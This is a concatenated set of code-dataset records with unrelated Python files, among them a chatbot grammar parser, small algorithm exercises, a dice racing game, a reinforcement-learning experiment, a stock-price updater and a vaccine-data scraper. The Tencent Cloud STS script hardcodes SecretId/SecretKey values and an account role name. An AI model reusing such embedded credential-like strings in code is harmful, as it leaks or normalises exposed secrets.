elem.tag in tags:\n print('=================================== Article Start ===================================')\n print_subtags(elem)\n elif(event == 'end' and elem.tag in tags):\n print('=================================== Article End ===================================') \n elem.clear()\n else:\n print(\"File does not exist\")\n\n\ndef main():\n articles = parse_xml_contents(XML_FILEPATH)\n write_articles_to_file(ARTICLES_FILEPATH, articles)\n\nmain()","sub_path":"cleanup/data_extraction.py","file_name":"data_extraction.py","file_ext":"py","file_size_in_byte":3732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"212959086","text":"#! /c/Python27/python\n# -*- coding: utf-8 -*-\n\"\"\"\n nyanbot.grammar\n ~~~~~~~~~~~~~~~\n\n Tokenizing and parsing chatbot commands.\n Shamelessly copied from watson (also another chatbot).\n\"\"\"\n\nclass Constant(object):\n \"\"\"\n A token object that represents a string literal. The literal may have a / in it to \n denote multiple values\n \"\"\"\n\n def __init__(self, name):\n self.values = name.split(\"/\")\n\n def match(self, word):\n \"\"\"\n Returns whether or not the word matches this constant's patterns\n \"\"\"\n return word in self.values\n\n def __repr__(self):\n return \"/\".join(self.values)\n\n\nclass Variable(object):\n \"\"\"\n A token object that represents a variable. All variables must contain < and >, and \n can have a prefix and/or suffix\n \"\"\"\n\n def __init__(self, name):\n i = name.find(\"<\")\n j = name.find(\">\")\n inner = name[i + 1:j]\n if not inner:\n raise Exception\n parts = inner.split(\"=\")\n if len(parts) == 1:\n self.name = parts[0]\n self.options = []\n else:\n # they put in some options we should save\n self.name = parts[0]\n self.options = parts[1].split(\"/\")\n\n self.prefix = name[:i]\n self.postfix = name[j + 1:]\n self.value = None\n\n def match(self, word):\n \"\"\"\n Returns whether or not the given word matches this variable's pattern, and sets \n its value if there is a match\n \"\"\"\n if word.startswith(self.prefix) and word.endswith(self.postfix):\n value = word[len(self.prefix):len(word) - len(self.postfix)]\n if not self.options or value in self.options:\n self.value = value\n return True\n return False\n\n def __repr__(self):\n return self.prefix + \"<\" + self.name + \">\" + self.postfix\n\n\ndef _create_options(string):\n \"\"\"\n Takes a syntax string and parses out all matching square brackets, and returns a list \n of all combinations of syntaxes that could be formed if the brackets were there or not\n \n ARGUMENTS\n string - the syntax string\n \n RETURNS\n a list of syntax strings that match whether the optional pieces may be present or not\n \n EXAMPLES\n _create_options(\"cow\") -> [\"cow\"]\n _create_options(\"cow [or lamb]\") -> [\"cow\",\"cow or lamb\"]\n _create_options(\"cow [or lamb[ada]]\") -> [\"cow\",\"cow or lamb\", \"cow or lambada\"]\n \"\"\"\n count = 0\n had_counted = False\n i = 0\n options = []\n\n for j in range(len(string)):\n if string[j] == \"[\":\n count += 1\n if not had_counted:\n i = j\n had_counted = True\n if string[j] == \"]\":\n count -= 1\n if not had_counted:\n raise Exception\n if count == 0 and had_counted:\n if not options:\n options = [_create_options(string[:i] + string[i + 1:j] + string[j + 1:]),\n _create_options(string[:i] + string[j + 1:])]\n options = [x for y in options for x in y]\n if count != 0:\n raise Exception\n\n if not options:\n options = [string]\n return options\n\n\ndef _populate_results(grammar):\n \"\"\"\n Takes a grammar that has been matched, and returns the values of its variables\n \"\"\"\n result = dict()\n for node in grammar:\n if isinstance(node, Variable):\n result[node.name] = node.value\n return result\n\n\ndef _create_grammar(grammar_string):\n \"\"\"\n Creates a grammar construct from a string by tokenizing by whitespace, then creating \n Constants and Variables for each token\n \"\"\"\n grammar = []\n\n words = grammar_string.split()\n\n for word in words:\n if word.find(\"<\") >= 0 or word.find(\">\") >= 0:\n if not (word.count(\"<\") == 1 and word.count(\">\") == 1 and word.find(\">\") > word.find(\"<\")):\n raise Exception\n node = Variable(word)\n else:\n node = Constant(word)\n grammar.append(node)\n return grammar\n\n\ndef create_grammars(grammar_string):\n \"\"\"\n Creates a list of all possible grammar objects from a string that may contain \n optional parts\n \"\"\"\n options = _create_options(grammar_string)\n return [_create_grammar(option) for option in options]\n\n\ndef _match_grammar(string, grammar):\n \"\"\"\n Determines if a string is a match for a grammar construct\n \"\"\"\n words = string.split()\n\n last = len(grammar) - 1\n for i, node in enumerate(grammar):\n if i > len(words) - 1:\n return False\n\n if i == last:\n return _populate_results(grammar) if node.match(\" \".join(words[i:])) else False\n\n if not node.match(words[i]):\n return False\n\n\ndef match_grammars(string, grammars):\n \"\"\"\n Takes a string and an iterable of grammars, and returns True if any of the grammars \n are matched by the string\n \n ARGUMENTS\n string - the input string we're matching against\n grammars - an iterable of grammars to check against\n \n RETURNS\n True if any of the grammars matched, False if not\n \"\"\"\n for grammar in grammars:\n result = _match_grammar(string, grammar)\n if result is not False:\n return result\n return False\n","sub_path":"nyanbot/grammar.py","file_name":"grammar.py","file_ext":"py","file_size_in_byte":5376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"590541368","text":"# coding=utf-8\r\nclass Solution(object):\r\n def totalHammingDistance(self, nums):\r\n \"\"\"\r\n :type nums: List[int]\r\n :rtype: int\r\n \"\"\"\r\n n = len(nums)\r\n if n == 0:\r\n return 0\r\n res = 0\r\n ma = len(bin(max(nums))) - 2\r\n while ma > 0:\r\n #temp = map(lambda x: x % 2, nums)\r\n count = len(filter(lambda x: x % 2 == 1, nums))\r\n res += count * (n-count)\r\n nums = map(lambda x: x / 2 , nums)\r\n #print temp, count, nums\r\n ma -= 1\r\n return res\r\n","sub_path":"S-Z/Total Hamming Distance.py","file_name":"Total Hamming Distance.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"263429635","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 2 17:17:44 2021\n\n@author: Camilo\n\"\"\"\n\n\nfrom random import randint\nfrom objetosjuego import *\n\nclass Carro:\n \n def __init__(self,jugador,f1):\n self.jugador=jugador\n self.f1=f1\n \n# Dist_Pistas={'Monza':4.1,\n# 'Bahrein':5.4,\n# 'Portimao':4.6,\n# 'Silverstone':5.8\n# }\n\nDist_Pistas={'Monza':4100,\n 'Bahrein':5400,\n 'Portimao':4600,\n 'Silverstone':5800\n }\n\n\nPistas={'Monza':'4.1 km',\n 'Bahrein':'5.4 km',\n 'Portimao':'4.6 km',\n 'Silverstone': '5.9 km'\n }\nX=['Monza', 'Bahrein','Portimao','Silverstone']\n\n\n\n#1. Configuración del juego\n\nprint('Bienvenido al Juego de Carros por consola!'+'\\n' + 'Seleccione una de las siguientes pistas a continuación:\\n' )\ncontador=1\nfor x, y in Pistas.items():\n print(str(contador)+'. ' + x, y)\n contador+=1\n \n\nSeleccion=int(input(\"Seleccione una de las opciones anteriores. En caso de no querer jugar, ingrese el número 0 para finalizar el juego: \"))\nwhile True:\n if Seleccion==1:\n Seleccion=X[0]\n break\n elif Seleccion==2:\n Seleccion=X[1]\n break\n elif Seleccion==3:\n Seleccion=X[2]\n break\n elif Seleccion==4:\n Seleccion=X[3]\n break\n elif Seleccion==0:\n break\n print(Seleccion)\n \n\n#!-------------------------------------especificar jugadores y crear los objetos con carros asignados\n\ncantidad_jugadores=int(input(\"Por favor indique cuantas personas van a participar del juego: \"))\ncarriles= []\n\ndistancia_pista=(Dist_Pistas.get(Seleccion)) \n\ndistancia_faltante=[]\nfor i in range(cantidad_jugadores):\n distancia_faltante.append(distancia_pista) \n\nfor i in range (cantidad_jugadores):\n jugador=input(\"Ingrese su nombre: \")\n f1=input(\"Ingrese su vehiculo: \")\n formula=Carro(jugador,f1)\n carriles.append(formula)\n \ndef desplazamientos(lanzar):\n global desplazar\n dado=randint(1,6)\n desplazar=dado*100\n print(f\"Distancia recorrida: {desplazar} metros.\")\n return desplazar\n\n\n#2. Inicio del juego\nprint(\"\\nRecuerde que en el orden en el que se registraron los participantes, será el orden para avanzar en el juego.\\n\")\n\n\n\npodio=[0,0,0]\nwhile True:\n for i in range(len(carriles)):\n pulsa=input(\"Pulse . para lanzar dados: \")\n desplazamientos(pulsa)\n distancia_faltante[i]=distancia_faltante[i]-desplazar\n print(f\"distancia para llegar a meta {distancia_faltante[i]} metros\")\n if distancia_faltante[i]<=0:\n podio[0].append(carriles[i])\n carriles.pop(0)\n if podio[0]!=0:\n for i in range(len(carriles)):\n pulsa=input(\"Pulse . para lanzar dados: \")\n desplazamientos(pulsa)\n distancia_faltante[i]=distancia_faltante[i]-desplazar\n print(f\"distancia para llegar a meta {distancia_faltante[i]} metros\")\n \n \n \n \n\n\n\n\n\n \n\n\n\n\n\n\n \n\n \n ","sub_path":"juegodecarros.py","file_name":"juegodecarros.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"415357481","text":"from rllab.algos.tnpg import TNPG\nfrom rllab.baselines.linear_feature_baseline import LinearFeatureBaseline\nfrom rllab.envs.gym_env import GymEnv\nfrom rllab.envs.normalized_env import normalize\nfrom rllab.policies.gaussian_mlp_policy import GaussianMLPPolicy\nfrom rllab.misc.instrument import run_experiment_lite\n\ntry:\n import seaborn as sns\n sns.set()\nexcept ImportError:\n print('\\nConsider installing seaborn (pip install seaborn) for better plotting!')\n\n\n# ==========================================================================\n# OpenAI diabetes envs - HovorkaInterval starts at the same value every time,\n# HovorkaIntervalRandom starts at a random value\n# ==========================================================================\n\ndef run_task(*_):\n env = normalize(GymEnv('HovorkaInterval-v0'))\n # env.wrapped_env.env.env.env.reward_flag = 'absolute'\n env.wrapped_env.env.env.reward_flag = 'gaussian'\n\n\n baseline = LinearFeatureBaseline(env_spec=env.spec)\n\n learn_std = True\n init_std=1\n\n # hidden_sizes=(8,)\n hidden_sizes=(32, 32)\n # hidden_sizes=(100, 50, 25)\n\n policy = GaussianMLPPolicy(\n env_spec=env.spec,\n hidden_sizes=hidden_sizes,\n learn_std=learn_std,\n init_std=init_std\n )\n\n # =======================\n # Defining the algorithm\n # =======================\n batch_size = 5000\n n_itr = 200\n gamma = .9\n step_size = 0.01\n\n algo = TNPG(\n env=env,\n policy=policy,\n baseline=baseline,\n batch_size=batch_size,\n n_itr=n_itr,\n discount=gamma,\n step_size=step_size\n )\n algo.train()\n\n return algo\n\n\n# log_dir = '~/Dropbox/results/jonas_experiments/no_stub/'\nDROPBOX_DIR = '/home/jonas/Dropbox/results/jonas_experiments/'\n# log_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/8'\nlog_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/32_32'\n# log_dir = DROPBOX_DIR + 'tnpg/gaussian/5000/100_50_25'\n# Running and saving the experiment\nrun_experiment_lite(\n run_task,\n # algo.train(),\n log_dir=log_dir,\n # n_parallel=2,\n n_parallel=1,\n # Only keep the snapshot parameters for the last iteration\n snapshot_mode=\"last\",\n # Specifies the seed for the experiment. If this is not provided, a random seed\n # will be used\n # exp_prefix=\"TNPG_\" + '32_32_',\n # exp_prefix=data_dir\n plot=False\n)\n\n\n","sub_path":"diabetes_experiments/scripts/tnpg_script_no_stub.py","file_name":"tnpg_script_no_stub.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"432080569","text":"# -*- coding:utf-8 -*-\nimport hashlib\nimport requests\nimport hmac\nimport random\nimport time\nimport base64\nfrom urllib import parse\n\nclass STS(object):\n def __init__(self, SecretId, SecretKey, RoleName, ExpireTime):\n self.SecretId = SecretId\n self.SecretKey = SecretKey\n self.RoleName = RoleName\n self.ExpireTime = ExpireTime\n self.requestHost = 'sts.api.qcloud.com'\n self.requestUri = '/v2/index.php?'\n\n def sts_param(self):\n keydict = {\n 'Action' : 'AssumeRole',\n 'roleArn' : self.RoleName,\n 'Verson' : '2017-03-12',\n 'roleSessionName' : 'cosrole',\n 'durationSecond' : str(self.ExpireTime),\n 'Region': 'ap-shanghai',\n 'Timestamp': str(int(time.time())),\n 'Nonce': str(int(random.random() * 1000)),\n 'SecretId': self.SecretId,\n }\n sortlist = sorted(zip(keydict.keys(), keydict.values()))\n return sortlist\n\n def sts_str_sign(self):\n sortlist = self.sts_param()\n sts_str_init = ''\n for value in sortlist:\n sts_str_init += str(value[0]) + '=' + str(value[1]) + '&'\n sts_str_init = sts_str_init[:-1]\n sign_str = 'GET' + self.requestHost + self.requestUri + sts_str_init\n return sign_str, sts_str_init\n\n def get_result_url(self):\n sign_str, sts_str_init = self.sts_str_sign()\n secretkey = self.SecretKey\n signature = bytes(sign_str, encoding='utf-8')\n secretkey = bytes(secretkey, encoding='utf-8')\n my_sign = hmac.new(secretkey, signature, hashlib.sha1).digest()\n my_sign = base64.b64encode(my_sign)\n result_sign = parse.quote(my_sign)\n result_url = 'https://' + self.requestHost + self.requestUri + sts_str_init + '&Signature=' + result_sign\n return result_url\n\nif __name__ == '__main__':\n SecretId = 'AKID54rSwEDD'\n SecretKey = 'qUI1zjF'\n RoleName = 'qcs::cam::uin/353488552:roleName/listcvm'\n ExpireTime = 3600\n STSoper = STS(SecretId, SecretKey, RoleName, ExpireTime)\n url = STSoper.get_result_url()\n try:\n response = requests.get(url)\n if response.status_code == 200:\n print(response.text)\n data = response.json()\n tmpSecretId = data['data']['credentials']['tmpSecretId']\n tmpSecretKey = data['data']['credentials']['tmpSecretKey']\n sessionToken = data['data']['credentials']['sessionToken']\n expiredTime = data['data']['expiration']\n print('Get sessionToken: %s' % sessionToken)\n print('Get tmpSecretId: %s' % tmpSecretId)\n print('Get tmpSecretKey: %s' % tmpSecretKey)\n print('Expiration: %s' % expiredTime)\n except Exception as e:\n print(e)\n\n\n","sub_path":"Qcloud/STS/getTmpRole.py","file_name":"getTmpRole.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"202320277","text":"# Given a string, find the shortest possible string which can be achieved by\n# adding characters to the end of initial string to make it a palindrome.\n\n# + Example\n\n# - For st = \"abcdc\", the output should be\n# > buildPalindrome(st) = \"abcdcba\".\n\n# + Input/Output\n\n# - [execution time limit] 4 seconds (py3)\n# - [input] string st\n# A string consisting of lowercase latin letters.\n# Guaranteed constraints:\n# 3 ≤ st.length ≤ 10.\n# - [output] string\n\n# + Solution\n\n# - 8/8\n\n\ndef buildPalindrome(s):\n pos = 0\n posLast = len(s) - 1\n\n for i, e in enumerate(s):\n if posLast <= pos:\n break\n elif e == s[posLast]:\n posLast -= 1\n else:\n pos = i + 1\n posLast = len(s) - 1\n\n return s + s[:pos][::-1]\n\n\nprint(buildPalindrome(\"abcdc\"))\n# > \"abcdcba\"\n","sub_path":"code-fights/arcade/intro/10-eruption-of-light/45-build-palindrome.py","file_name":"45-build-palindrome.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"238847866","text":"from datetime import datetime\nfrom apscheduler.schedulers.background import BackgroundScheduler\nimport mysql.connector\nfrom datetime import date\nimport datetime\nimport time\nimport yahoo_fin.stock_info as yf\n\nstocks = ['AAPL', 'AMZN', 'FB', 'GOOGL', 'NFLX', 'TSLA', 'TWTR', 'YELP', 'VAC', 'TRIP']\n\n# connect to mysql database\nmydb = mysql.connector.connect(\n host=\"127.0.0.1\",\n user=\"root\",\n passwd=\"*********\",\n database=\"SuperStonks\",\n buffered=True,\n \n)\n\nmycursor = mydb.cursor()\nmycursor.execute(\"SET SQL_SAFE_UPDATES = 0;\")\n\n\n\ndef get_hist():\n\n for stock in stocks:\n mycursor.execute(\"SELECT sid from stocks where ticker='\" + stock + \"'\")\n result = mycursor.fetchall()\n sid = result[0][0]\n\n data = yf.get_data(ticker=stock, start_date=date.today())\n dat = date.today()\n open_value = data.iloc[0, :]['open']\n close_value = data.iloc[0, :]['close']\n low = data.iloc[0, :]['low']\n high = data.iloc[0, :]['high']\n volume = data.iloc[0, :]['volume']\n sql = \"INSERT IGNORE INTO historical (sid,dat,open_value,low,high,close_value,volume) \" \\\n \"VALUES (%s,%s,%s,%s,%s,%s,%s)\"\n val = (str(sid), str(dat), str(open_value), str(low), str(high), str(close_value), str(volume))\n mycursor.execute(sql, val)\n mydb.commit()\n\n\ndef get_real():\n limit = 2500\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y-%m-%d %H:%M:%S')\n dt_array = ts.strip().split(\" \")\n dat = dt_array[0].strip()\n tim = dt_array[1].strip()\n\n for stock in stocks:\n details = yf.get_quote_table(stock)\n\n open_value = str(details['Open']).replace(',', '')\n day_range = str(details['Day\\'s Range']).strip().split(\"-\")\n low = day_range[0].strip().replace(',', '')\n high = day_range[len(day_range) - 1].strip().replace(',', '')\n close_value = str(yf.get_live_price(stock))\n volume = str(details['Volume']).replace(',', '')\n\n mycursor.execute(\"SELECT sid from stocks where ticker='\" + stock + \"'\")\n result = mycursor.fetchall()\n sid = str(result[0][0])\n\n sql = \"INSERT IGNORE INTO real_time (sid,dat,tim,open_value,low,high,close_value,volume) \" \\\n \"VALUES (%s,%s,%s,%s,%s,%s,%s,%s)\"\n val = (sid, dat, tim, open_value, low, high, close_value, volume)\n print(val)\n mycursor.execute(sql, val)\n mydb.commit()\n\n\n mycursor.execute(\"SELECT count(*) from real_time where sid='\" + str(sid) + \"'\")\n result = mycursor.fetchall()\n rows = int(result[0][0])\n if rows > limit:\n num_delete = rows - limit\n sql = \"delete from real_time where sid='\" + str(sid) + \"' order by dat asc, tim asc limit \" \\\n + str(num_delete) + \";\"\n mycursor.execute(sql)\n mydb.commit()\n\n\ndef start():\n scheduler = BackgroundScheduler(daemon=True)\n scheduler.add_job(get_real, trigger='cron', hour = '10-15', minute = '0-59', second = '0', day_of_week = '0-4')\n scheduler.add_job(get_hist, trigger='cron', hour='17', minute='0', second='0', day_of_week='0-4')\n scheduler.start()\n\nif __name__ == \"__main__\":\n get_real()","sub_path":"updater/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"100768885","text":"import numpy as np\nfrom SimPEG import Utils, Survey\nimport properties\n\n\nclass GlobalAEMSurvey(Survey.BaseSurvey, properties.HasProperties):\n\n # This assumes a multiple sounding locations\n rx_locations = properties.Array(\n \"Receiver locations \", dtype=float, shape=('*', 3)\n )\n src_locations = properties.Array(\n \"Source locations \", dtype=float, shape=('*', 3)\n )\n topo = properties.Array(\n \"Topography\", dtype=float, shape=('*', 3)\n )\n\n half_switch = properties.Bool(\"Switch for half-space\", default=False)\n\n _pred = None\n\n\n\n @Utils.requires('prob')\n def dpred(self, m, f=None):\n \"\"\"\n Return predicted data.\n Predicted data, (`_pred`) are computed when\n self.prob.fields is called.\n \"\"\"\n if f is None:\n f = self.prob.fields(m)\n\n return self._pred\n\n @property\n def n_sounding(self):\n \"\"\"\n # of Receiver locations\n \"\"\"\n return self.rx_locations.shape[0]\n\n def read_xyz_data(self, fname):\n \"\"\"\n Read csv file format\n This is a place holder at this point\n \"\"\"\n pass\n\n @property\n def nD(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_nD', None) is None:\n self._nD = self.nD_vec.sum()\n return self._nD\n\nclass GlobalAEMSurveyTD(GlobalAEMSurvey):\n\n # --------------- Essential inputs ---------------- #\n src_type = None\n\n rx_type = None\n\n field_type = None\n\n time = []\n\n wave_type = None\n\n moment_type = None\n\n moment = None\n\n time_input_currents = []\n\n input_currents = []\n\n # --------------- Selective inputs ---------------- #\n n_pulse = properties.Array(\n \"The number of pulses\",\n default=None\n )\n\n base_frequency = properties.Array(\n \"Base frequency (Hz)\",\n dtype=float, default=None\n )\n\n offset = properties.Array(\n \"Src-Rx offsets\", dtype=float, default=None,\n shape=('*', '*')\n )\n\n I = properties.Array(\n \"Src loop current\", dtype=float, default=None\n )\n\n radius = properties.Array(\n \"Src loop radius\", dtype=float, default=None\n )\n\n use_lowpass_filter = properties.Array(\n \"Switch for low pass filter\",\n dtype=bool, default=None\n )\n\n high_cut_frequency = properties.Array(\n \"High cut frequency for low pass filter (Hz)\",\n dtype=float, default=None\n )\n\n # ------------- For dual moment ------------- #\n\n time_dual_moment = []\n\n time_input_currents_dual_moment = []\n\n input_currents_dual_moment = []\n\n base_frequency_dual_moment = properties.Array(\n \"Base frequency for the dual moment (Hz)\",\n dtype=float, default=None\n )\n\n def __init__(self, **kwargs):\n GlobalAEMSurvey.__init__(self, **kwargs)\n self.set_parameters()\n\n def set_parameters(self):\n # TODO: need to put some validation process\n # e.g. for VMD `offset` must be required\n # e.g. for CircularLoop `a` must be required\n\n print(\">> Set parameters\")\n if self.n_pulse is None:\n self.n_pulse = np.ones(self.n_sounding, dtype=int) * 1\n\n if self.base_frequency is None:\n self.base_frequency = np.ones(\n (self.n_sounding), dtype=float\n ) * 30\n\n if self.offset is None:\n self.offset = np.empty((self.n_sounding, 1), dtype=float)\n\n if self.moment is None:\n self.moment = np.ones(self.n_sounding, dtype=float)\n\n if self.radius is None:\n self.radius = np.empty(self.n_sounding, dtype=float)\n\n if self.use_lowpass_filter is None:\n self.use_lowpass_filter = np.zeros(self.n_sounding, dtype=bool)\n\n if self.high_cut_frequency is None:\n self.high_cut_frequency = np.empty(self.n_sounding, dtype=float)\n\n if self.moment_type is None:\n self.moment_type = np.array([\"single\"], dtype=str).repeat(\n self.n_sounding, axis=0\n )\n\n # List\n if not self.time_input_currents:\n self.time_input_currents = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.input_currents:\n self.input_currents = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n\n # List\n if not self.time_dual_moment:\n self.time_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.time_input_currents_dual_moment:\n self.time_input_currents_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n # List\n if not self.input_currents_dual_moment:\n self.input_currents_dual_moment = [\n np.empty(1, dtype=float) for i in range(self.n_sounding)\n ]\n\n if self.base_frequency_dual_moment is None:\n self.base_frequency_dual_moment = np.empty(\n (self.n_sounding), dtype=float\n )\n\n @property\n def nD_vec(self):\n if getattr(self, '_nD_vec', None) is None:\n self._nD_vec = []\n\n for ii, moment_type in enumerate(self.moment_type):\n if moment_type == 'single':\n self._nD_vec.append(self.time[ii].size)\n elif moment_type == 'dual':\n self._nD_vec.append(\n self.time[ii].size+self.time_dual_moment[ii].size\n )\n else:\n raise Exception(\"moment_type must be either signle or dual\")\n self._nD_vec = np.array(self._nD_vec)\n return self._nD_vec\n\n @property\n def data_index(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_data_index', None) is None:\n self._data_index = [\n np.arange(self.nD_vec[i_sounding])+np.sum(self.nD_vec[:i_sounding]) for i_sounding in range(self.n_sounding)\n ]\n return self._data_index\n\n @property\n def nD(self):\n # Need to generalize this for the dual moment data\n if getattr(self, '_nD', None) is None:\n self._nD = self.nD_vec.sum()\n return self._nD\n\n\ndef get_skytem_survey(\n topo,\n src_locations,\n rx_locations,\n time,\n time_input_currents,\n input_currents,\n base_frequency=25,\n src_type=\"VMD\",\n rx_type=\"dBzdt\",\n moment_type=\"dual\",\n time_dual_moment=None,\n time_input_currents_dual_moment=None,\n input_currents_dual_moment=None,\n base_frequency_dual_moment=210,\n wave_type=\"general\",\n field_type=\"secondary\",\n\n):\n\n n_sounding = src_locations.shape[0]\n time_list = [time for i in range(n_sounding)]\n time_dual_moment_list = [time_dual_moment for i in range(n_sounding)]\n src_type_array = np.array([src_type], dtype=str).repeat(n_sounding)\n rx_type_array = np.array([rx_type], dtype=str).repeat(n_sounding)\n wave_type_array = np.array([wave_type], dtype=str).repeat(n_sounding)\n field_type_array = np.array([field_type], dtype=str).repeat(n_sounding)\n input_currents_list=[input_currents for i in range(n_sounding)]\n time_input_currents_list=[time_input_currents for i in range(n_sounding)]\n base_frequency_array = np.array([base_frequency]).repeat(n_sounding)\n input_currents_dual_moment_list =[input_currents_dual_moment for i in range(n_sounding)]\n time_input_currents_dual_moment_list =[time_input_currents_dual_moment for i in range(n_sounding)]\n base_frequency_dual_moment_list = np.array([base_frequency_dual_moment]).repeat(n_sounding)\n moment_type_array = np.array([moment_type], dtype=str).repeat(n_sounding)\n\n survey = GlobalAEMSurveyTD(\n topo = topo,\n src_locations = src_locations,\n rx_locations = rx_locations,\n src_type = src_type_array,\n rx_type = rx_type_array,\n field_type = field_type,\n time = time_list,\n wave_type = wave_type_array,\n moment_type = moment_type_array,\n time_input_currents = time_input_currents_list,\n input_currents = input_currents_list,\n base_frequency = base_frequency_array,\n time_dual_moment = time_dual_moment_list,\n time_input_currents_dual_moment = time_input_currents_dual_moment_list,\n input_currents_dual_moment = input_currents_dual_moment_list,\n base_frequency_dual_moment = base_frequency_dual_moment_list,\n )\n\n return survey\n","sub_path":"notebook/toSherlockAEM/simpegskytem/Survey.py","file_name":"Survey.py","file_ext":"py","file_size_in_byte":8644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"576393274","text":"import camelot\nimport pandas as pd\nimport us\n\nfrom can_tools.scrapers import variables\nfrom can_tools.scrapers.base import CMU\nfrom can_tools.scrapers.official.base import StateDashboard, TableauDashboard\n\n\nclass NoTableauMapFiltersFoundError(Exception):\n \"\"\"Raised if no Tableau Map Filters are found.\"\"\"\n\n\nclass ArizonaVaccineCounty(TableauDashboard):\n \"\"\"\n Fetch county level covid data from Arizona's Tableau dashboard\n \"\"\"\n\n baseurl = \"https://tableau.azdhs.gov\"\n viewPath = \"VaccineDashboard/Vaccineadministrationdata\"\n\n # Initlze\n source = \"https://www.azdhs.gov/preparedness/epidemiology-disease-control/infectious-disease-epidemiology/covid-19/dashboards/index.php\"\n source_name = \"Arizona Department Of Health Services\"\n has_location = False\n location_type = \"county\"\n state_fips = int(us.states.lookup(\"Arizona\").fips)\n location_name_col = \"location_name\"\n timezone = \"US/Mountain\"\n\n filterFunctionName = (\n \"[federated.1rsrm840sp0wgc11a5yw61x1aht3].[Calculation_624592978064752643]~s0\"\n )\n counties = [\n [\"APACHE\", 4001],\n [\"COCHISE\", 4003],\n [\"COCONINO\", 4005],\n [\"GILA\", 4007],\n [\"GRAHAM\", 4009],\n [\"GREENLEE\", 4011],\n [\"LA PAZ\", 4012],\n [\"MARICOPA\", 4013],\n [\"MOHAVE\", 4015],\n [\"NAVAJO\", 4017],\n [\"PIMA\", 4019],\n [\"PINAL\", 4021],\n [\"SANTA CRUZ\", 4023],\n [\"YAVAPAI\", 4025],\n [\"YUMA\", 4027],\n ]\n\n cmus = {\n \"total_vaccine_initiated\": variables.INITIATING_VACCINATIONS_ALL,\n \"total_vaccine_completed\": variables.FULLY_VACCINATED_ALL,\n \"total_doses_administered\": variables.TOTAL_DOSES_ADMINISTERED_ALL,\n }\n\n def fetch(self):\n dfs = []\n for county_name, fips in self.counties:\n self.filterFunctionValue = county_name\n county_data = self.get_tableau_view()\n data = {\n \"total_doses_administered\": self._get_doses_administered(county_data),\n \"total_vaccine_initiated\": self._get_vaccines_initiated(county_data),\n \"total_vaccine_completed\": self._get_vaccines_completed(county_data),\n \"location\": fips,\n \"location_name\": county_name,\n }\n dfs.append(pd.DataFrame(data))\n\n # Concat the dfs\n output_df = pd.concat(dfs, axis=0, ignore_index=True)\n return output_df\n\n def _get_doses_administered(self, data):\n return data[\"Number of Doses\"][\"AGG(Number of Doses)-alias\"]\n\n def _get_vaccines_completed(self, data):\n return data[\"Complete Vaccine Series\"][\n \"AGG(Total number of people (LOD))-alias\"\n ]\n\n def _get_vaccines_initiated(self, data):\n return data[\" County using admin county\"][\"AGG(Number of People)-alias\"]\n\n\nclass ArizonaVaccineCountyAllocated(StateDashboard):\n \"\"\"\n Fetch county level Covid-19 vaccination data from official state of Arizona PDF\n \"\"\"\n\n source = \"https://directorsblog.health.azdhs.gov/covid-19-vaccine-surveillance/\"\n source_name = \"Arizona Department Of Health Services\"\n has_location = False\n location_type = \"county\"\n state_fips = int(us.states.lookup(\"Arizona\").fips)\n\n def fetch(self):\n # Set url of downloadable dataset\n url = \"https://azdhs.gov/documents/preparedness/epidemiology-disease-control/infectious-disease-epidemiology/novel-coronavirus/vaccine-phases.pdf\"\n\n return camelot.read_pdf(url, pages=\"2\", flavor=\"stream\")\n\n def normalize(self, data) -> pd.DataFrame:\n # adding values to this array will cause all rows where location_name is\n # in this array to be removed\n non_counties = [\"Tribes\"]\n # Sanity check how many tables we got back\n if len(data) > 1:\n raise ValueError(\"more tables returned than expected value\")\n\n # Read data into data frames\n df = data[0].df\n\n # Remove extra header and footer columns\n df = df.iloc[6:-7].reset_index(drop=True)\n\n # Use this if we want to include State PODs, Tribes, CDC Pharmacy Partnership, and ADHS\n # loc_replacer = {\"State PODs**\": \"State PODs\", \"ADHS‡\": \"ADHS\"}\n # df = df.replace({\"location_name\": loc_replacer})\n # df = df.drop([16, 18])\n # df.at[17, 0] = \"CDC Pharmacy Partnership\"\n\n # Rename column names\n df.columns = [\n \"location_name\",\n \"pfizer_vaccine_allocated_new_doses\",\n \"pfizer_vaccine_allocated\",\n \"moderna_vaccine_allocated_new_doses\",\n \"moderna_vaccine_allocated\",\n \"janssen_vaccine_new_doses\",\n \"janssen_vaccine_allocated\",\n \"total_vaccine_allocated\",\n ]\n\n # Determine what columns to keep\n cols_to_keep = [\n \"location_name\",\n \"pfizer_vaccine_allocated\",\n \"moderna_vaccine_allocated\",\n \"janssen_vaccine_allocated\",\n \"total_vaccine_allocated\",\n ]\n\n # Drop extraneous columns\n df = df.loc[:, cols_to_keep]\n\n # Create dictionary for columns to map\n crename = {\n \"moderna_vaccine_allocated\": CMU(\n category=\"moderna_vaccine_allocated\",\n 